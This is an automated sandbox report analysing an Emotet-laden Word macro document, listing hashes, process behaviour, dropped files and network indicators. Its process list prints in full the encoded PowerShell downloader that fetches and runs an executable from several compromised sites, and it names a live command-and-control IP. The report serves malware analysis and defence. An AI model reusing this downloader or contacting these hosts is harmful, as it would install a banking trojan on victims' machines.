analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

BL_B5HP885M08_HB.doc

Full analysis: https://app.any.run/tasks/3bdf63a3-755a-4819-ad82-5dc24b75afb7
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 18, 2019, 20:06:39
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
emotet-doc
emotet
generated-doc
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Tasty Wooden Mouse Legacy Handcrafted, Subject: Intelligent Granite Bike, Author: Ezekiel Dare, Comments: connect, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:32:00 2019, Last Saved Time/Date: Wed Sep 18 15:32:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

2792353F03A08766D5A8A5CFCDC11755

SHA1:

3B9A6EF019994990FA79B8FD063BFD4AF8746672

SHA256:

7B2142363813A41FD3A512CA6BBD2E3D73D274558F58CA990D78A1537EBFCBD8

SSDEEP:

6144:VC1qmTgpbxDj2kCUSfp400TPLkIq7NSU4jJntATfDxBlPi75:VC1qmTgpbxDj2kCUSfp400/Xq7NSU4Vp

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 133.exe (PID: 2764)
      • 133.exe (PID: 3812)
      • 133.exe (PID: 2576)
      • 133.exe (PID: 4016)
      • easywindow.exe (PID: 552)
      • easywindow.exe (PID: 2980)
      • easywindow.exe (PID: 3672)
      • easywindow.exe (PID: 3076)
    • Emotet process was detected

      • 133.exe (PID: 2764)
    • Changes the autorun value in the registry

      • easywindow.exe (PID: 3672)
    • Connects to CnC server

      • easywindow.exe (PID: 3672)
    • EMOTET was detected

      • easywindow.exe (PID: 3672)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2336)
    • PowerShell script executed

      • powershell.exe (PID: 2336)
    • Executed via WMI

      • powershell.exe (PID: 2336)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2336)
      • 133.exe (PID: 2764)
    • Starts itself from another location

      • 133.exe (PID: 2764)
    • Connects to server without host name

      • easywindow.exe (PID: 3672)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3564)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3564)
    • Reads settings of System Certificates

      • powershell.exe (PID: 2336)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Tasty Wooden Mouse Legacy Handcrafted
Subject: Intelligent Granite Bike
Author: Ezekiel Dare
Keywords: -
Comments: connect
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:18 14:32:00
ModifyDate: 2019:09:18 14:32:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Roberts - Lebsack
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Parker
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
10
Malicious processes
6
Suspicious processes
3

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 133.exe no specs 133.exe no specs 133.exe no specs #EMOTET 133.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3564"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\BL_B5HP885M08_HB.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
2336powershell -encod JABQAGEAaQAxAFUAaQAxADMAPQAnAHAAQQBUAGMAUwBqAGwAJwA7ACQAdwBpAGEAWQBXAEUAIAA9ACAAJwAxADMAMwAnADsAJABqAEwAXwBLAG4AUwBaADIAPQAnAGQAYgB0AFoARAAzAHUAaQAnADsAJABHADIAdwB2AEEATwBDAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJAB3AGkAYQBZAFcARQArACcALgBlAHgAZQAnADsAJAB6ADUARQB3AE8AMgB2AD0AJwBzAHoATwBHAFAASwAnADsAJABRADgAawB6AGoAegAwAD0AJgAoACcAbgBlAHcALQBvAGIAagBlACcAKwAnAGMAJwArACcAdAAnACkAIABuAGUAVAAuAHcAZQBCAGMAbABJAEUAbgBUADsAJABuAGIATABPAE4AZABXAFYAPQAnAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAYQB0AHIAaQBjAGsAZwBsAG8AYgBhAGwAdQBzAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGYAUwBSAGsAQQBGAGoAcQB2AC8AQABoAHQAdABwAHMAOgAvAC8AcABpAHAAaQB6AGgAYQBuAHoAaABhAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AMwBjAGkAbwByAG4AegBfAGkAdQBsAGEAeQBzAGMAegAtADYANwA5ADYANAA2AC8AQABoAHQAdABwAHMAOgAvAC8AdABhAG4AawBoAG8AaQAuAHYAbgAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAFgAVABTAHUAZwB6AE4AYQB6AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBzAHUAcABlAHIAYwByAHkAcwB0AGEAbAAuAGEAbQAvAHcAcAAtAGEAZABtAGkAbgAvAFAAZABNAEkAbgBTAGcAcwAvAEAAaAB0AHQAcABzADoALwAvAGgAbwB0AGUAbAAtAGIAcgBpAHMAdABvAGwALgBsAHUALwBkAGwAcgB5AC8ATQBBAG4ASgBJAFAAbgBZAC8AJwAuACIAUwBwAGAAbABpAHQAIgAoACcAQAAnACkAOwAkAFEATgBCAEUAXwByADkAPQAnAE8ANQBaAGEAMQBDAFUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFMANgBmADgAUgBXAFIAIABpAG4AIAAkAG4AYgBMAE8ATgBkAFcAVgApAHsAdAByAHkAewAkAFEAOABrAHoAagB6ADAALgAiAGQAYABPAFcAYABOAGwATwBBAEQAYABGAGkATABFACIAKAAkAFMANgBmADgAUgBXAFIALAAgACQARwAyAHcAdgBBAE8AQwApADsAJABwAEgATAA3AHcAaAA9ACcAUQBMAFYAVgBkAFAAOAAnADsASQBmACAAKAAoAC4AKAAnAEcAZQAnACsAJwB0AC0AJwArACcASQB0AGUAbQAnACkAIAAkAEcAMgB3AHYAQQBPAEMAKQAuACIATABFAGAATgBHAFQASAAiACAALQBnAGUAIAAyADgAOAAwADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AEEAYABSAFQAIgAoACQARwAyAHcAdgBBAE8AQwApADsAJABvAFMAOQBNAEcAOQAzAD0AJwBFADEAQgB1ADYAagBPAFgAJwA7AGIAcgBlAGEAawA7ACQAVABiAGYASgBhAFkAPQAnAEIAegBwAGMAXwBaAHMAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARABtAEEATwBFAE4APQAnAG0AUgBiAGIAMQBQADMAOAAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2576"C:\Users\admin\133.exe" C:\Users\admin\133.exepowershell.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3812"C:\Users\admin\133.exe" C:\Users\admin\133.exe133.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
4016--8ddf1eefC:\Users\admin\133.exe133.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2764--8ddf1eefC:\Users\admin\133.exe
133.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
552"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe133.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
2980"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3076--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3672--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Integrity Level:
MEDIUM
Total events
2 684
Read events
2 463
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
2
Unknown types
45

Dropped files

PID
Process
Filename
Type
3564WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9B99.tmp.cvr
MD5:
SHA256:
3564WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\BL_B5HP885M08_HB.doc.LNKlnk
MD5:930D977E5284E2928DD8793A2934CD39
SHA256:21B757462FE75C8D796324413C61BD7D78FF7E13B5B2EEF08F5740849A21E030
3564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F04BF2A.wmfwmf
MD5:E7371AAF6E2069BF5A62504621DBB16B
SHA256:88F638AA35D457272EDE0EF04828FC1234A1C692F1D4A6A5FC8C61AAEA84AF84
3564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D98B4DC2.wmfwmf
MD5:E275B9D39B1EE83BDACD6FD0FEDC7E9F
SHA256:C734B66B3F0C0B1909E374AFD300BF413C97FC5BC0AF78AFC05A522921B8C31C
3564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F23D328D.wmfwmf
MD5:2353260EC885C3A98A6C89D22AFF1248
SHA256:E5117450EB7E41006FA9842A34889226A089FD0434E1EB70E9A3FAEE5353B13C
3564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\461EB0C8.wmfwmf
MD5:73658496962CE3CEF198A29B1E1E6875
SHA256:AD0827A843CFFE953C2634A18077B0428A60B4024285CA199601F031708A54D3
3564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D717320.wmfwmf
MD5:9C82C46ADD9E05F1EC26C90EBED6FC3B
SHA256:4C3302B7DD579D9D80E452B882FFA141A763B87681B67A71F28AECC69CCD5CBF
3564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F5A3FA16.wmfwmf
MD5:15D50A1E4FACE721563EEE94D5413CE8
SHA256:D1EAF8F0F79906A21F24340A041CCACBB0568324110E08B90E003C6ECEB81091
3564WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D86AA29.wmfwmf
MD5:B419C90F42F3A4C5D5601F2F63E4E4C0
SHA256:06874DA9DB510979C840838C515DD39001F605663AB249CB831FB165E93249E7
3564WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:FC520A0524A7464A2C3BD220271713B6
SHA256:8C3EFC362C48D763D6E101C6C7AA087A85F5EA0C06F23A1F62DD4F64810B3775
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
4
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3672
easywindow.exe
POST
200
190.18.146.70:80
http://190.18.146.70/site/
AR
binary
148 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
190.18.146.70:80
CABLEVISION S.A.
AR
malicious
2336
powershell.exe
111.67.206.122:443
pipizhanzhang.com
China Unicom Beijing Province Network
CN
unknown
2336
powershell.exe
148.251.180.153:443
www.patrickglobalusa.com
Hetzner Online GmbH
DE
malicious

DNS requests

Domain
IP
Reputation
www.patrickglobalusa.com
  • 148.251.180.153
malicious
pipizhanzhang.com
  • 111.67.206.122
unknown

Threats

PID
Process
Class
Message
3672
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3672
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3 ETPRO signatures available at the full report
No debug info